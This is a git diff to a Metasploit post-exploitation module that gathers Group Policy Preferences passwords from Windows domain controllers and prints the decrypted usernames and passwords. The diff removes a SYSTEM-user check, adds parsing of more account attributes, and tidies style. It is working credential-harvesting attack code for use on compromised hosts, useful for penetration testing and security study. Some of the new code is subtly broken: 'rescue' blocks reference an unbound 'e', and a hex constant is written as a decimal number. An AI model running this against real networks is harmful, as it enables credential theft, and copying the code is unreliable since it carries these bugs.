diff --git a/modules/post/windows/gather/credentials/gpp.rb b/modules/post/windows/gather/credentials/gpp.rb
index a59d54491c..e935daa890 100644
--- a/modules/post/windows/gather/credentials/gpp.rb
+++ b/modules/post/windows/gather/credentials/gpp.rb
@@ -28,9 +28,6 @@ class Metasploit3 < Msf::Post
 
 				Users can specify ALL=True to target all domains and their domain controllers
 				on the network.
-
-				This module must be run under a domain user or the user will not have appropriate
-				permissions to read files from the domain controller(s).
 			},
 			'License'       => MSF_LICENSE,
 			'Author'        =>[
@@ -58,11 +55,6 @@ class Metasploit3 < Msf::Post
 	end
 
 	def run
-		if is_system?
-			print_error "This needs to be run as a Domain User, not SYSTEM"
-			return nil
-		end
-
 		dcs = []
 		paths = []
 
@@ -87,7 +79,7 @@ class Metasploit3 < Msf::Post
 				dcs << found_dcs[0] unless found_dcs.to_a.empty?
 			end
 		elsif datastore['CURRENT']
-			dcs << get_domain_controller()
+			dcs << get_domain_controller
 		else
 			print_error "Invalid Arguments, please supply one of CURRENT, ALL or DOMAINS arguments"
 			return nil
@@ -156,6 +148,15 @@ class Metasploit3 < Msf::Post
 			user = node.attributes['userName']
 			newname = node.attributes['newName']
 			disabled = node.attributes['acctDisabled']
+			action = node.attributes['action']
+			expires = node.attributes['expires']
+			never_expires = node.attributes['neverExpires']
+			description = node.attributes['description']
+			full_name = node.attributes['fullName']
+			no_change = node.attributes['noChange']
+			change_logon = node.attributes['changeLogon']
+			sub_authority = node.attributes['subAuthority']
+			changed = node.parent.attributes['changed'] # n.b. parent attribute.
 
 			# Check if policy also specifies the user is renamed.
 			if !newname.to_s.empty?
@@ -166,7 +167,7 @@ class Metasploit3 < Msf::Post
 
 			# UNICODE conversion
 			pass = pass.unpack('v*').pack('C*')
-			print_good("DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled}")
+			print_good "DOMAIN CONTROLLER: #{domain_controller} USER: #{user} PASS: #{pass} DISABLED: #{disabled} CHANGED: #{changed}"
 
 			if session.db_record
 				source_id = session.db_record.id
@@ -203,7 +204,7 @@ class Metasploit3 < Msf::Post
 	#enum_domains.rb
 	def enum_domains
 		print_status "Enumerating Domains on the Network..."
-		domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM =  hex 80000000
+		domain_enum = 80000000 # SV_TYPE_DOMAIN_ENUM
 		buffersize = 500
 		result = client.railgun.netapi32.NetServerEnum(nil,100,4,buffersize,4,4,domain_enum,nil,nil)
 		# Estimate new buffer size on percentage recovered.
@@ -222,14 +223,15 @@ class Metasploit3 < Msf::Post
 		base = 0
 		domains = []
 		mem = client.railgun.memread(startmem, 8*count)
-		count.times{|i|
+		count.times do |i|
 				x = {}
 				x[:platform] = mem[(base + 0),4].unpack("V*")[0]
 				nameptr = mem[(base + 4),4].unpack("V*")[0]
 				x[:domain] = client.railgun.memread(nameptr,255).split("\0\0")[0].split("\0").join
 				domains << x
 				base = base + 8
-			}
+		end
+
 		return domains
 	end
 
@@ -277,7 +279,9 @@ class Metasploit3 < Msf::Post
 			value = v.data
 			open_key.close
 		rescue
+			print_error e.message
 		end
+
 		return value
 	end
 
@@ -289,9 +293,15 @@ class Metasploit3 < Msf::Post
 			v_name = "DCName"
 			domain = reg_getvaldata(subkey, v_name)
 		rescue
-			print_error "This host is not part of a domain."
+			print_error e.message 
+		end
+
+		if domain.nil?
+			print_error "No domain controller retrieved - is this machine part of a domain?"
+			return nil
+		else
+			return domain.sub!(/\\\\/,'')
 		end
-		return domain.sub!(/\\\\/,'')
 	end
 end